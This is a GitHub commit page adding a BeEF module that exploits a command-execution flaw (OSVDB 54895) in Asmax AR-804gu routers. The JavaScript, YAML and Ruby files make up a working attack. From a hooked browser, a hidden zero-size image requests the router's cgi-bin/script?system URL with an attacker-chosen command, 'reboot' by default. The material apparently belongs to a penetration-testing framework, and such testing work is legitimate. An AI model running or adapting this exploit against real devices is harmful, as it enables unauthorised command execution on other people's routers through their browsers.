Permalink
Browse files

Added Asmax AR-804gu Command Execution module

  • Loading branch information...
1 parent c380ca7 commit d8adf26827cc7751a5fd77425ab0e1dcdae84040 @bcoles bcoles committed Jul 14, 2012
@@ -0,0 +1,38 @@
+//
+// Copyright 2012 Wade Alcorn wade@bindshell.net
+//
+// Licensed under the Apache License, Version 2.0 (the "License");
+// you may not use this file except in compliance with the License.
+// You may obtain a copy of the License at
+//
+// http://www.apache.org/licenses/LICENSE-2.0
+//
+// Unless required by applicable law or agreed to in writing, software
+// distributed under the License is distributed on an "AS IS" BASIS,
+// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+// See the License for the specific language governing permissions and
+// limitations under the License.
+//
+beef.execute(function() {
+
+ var gateway = '<%= @base %>';
+ var path = 'cgi-bin/script?system%20';
+ var cmd = '<%= @cmd %>';
+
+ var img = new Image();
+ img.setAttribute("style","visibility:hidden");
+ img.setAttribute("width","0");
+ img.setAttribute("height","0");
+ img.id = 'asmax_ar804gu';
+ img.src = gateway+path+cmd;
+ document.body.appendChild(img);
+
+ beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
+
+ cleanup = function() {
+ document.body.removeChild(img);
+ }
+ setTimeout("cleanup()", 15000);
+
+});
+
@@ -0,0 +1,25 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+beef:
+ module:
+ asmax_ar804gu_cmd_exec:
+ enable: true
+ category: ["Exploits", "Router"]
+ name: "Asmax AR-804gu Command Execution"
+ description: "Attempts to execute arbitrary commands on a Asmax AR-804gu (OSVDB# 54895).<br/>For more information see, http://www.securitum.pl/dh/asmax-ar-804-gu-compromise"
+ authors: ["bcoles", "Michal Sajdak"]
+ target:
+ working: ["ALL"]
@@ -0,0 +1,29 @@
+#
+# Copyright 2012 Wade Alcorn wade@bindshell.net
+#
+# Licensed under the Apache License, Version 2.0 (the "License");
+# you may not use this file except in compliance with the License.
+# You may obtain a copy of the License at
+#
+# http://www.apache.org/licenses/LICENSE-2.0
+#
+# Unless required by applicable law or agreed to in writing, software
+# distributed under the License is distributed on an "AS IS" BASIS,
+# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+# See the License for the specific language governing permissions and
+# limitations under the License.
+#
+class Asmax_ar804gu_cmd_exec < BeEF::Core::Command
+
+ def self.options
+ return [
+ {'name' => 'base', 'ui_label' => 'Router web root', 'value' => 'http://192.168.1.1/'},
+ {'name' => 'cmd', 'ui_label' => 'Command', 'value' => 'reboot'}
+ ]
+ end
+
+ def post_execute
+ save({'result' => @datastore['result']})
+ end
+
+end

0 comments on commit d8adf26

Please sign in to comment.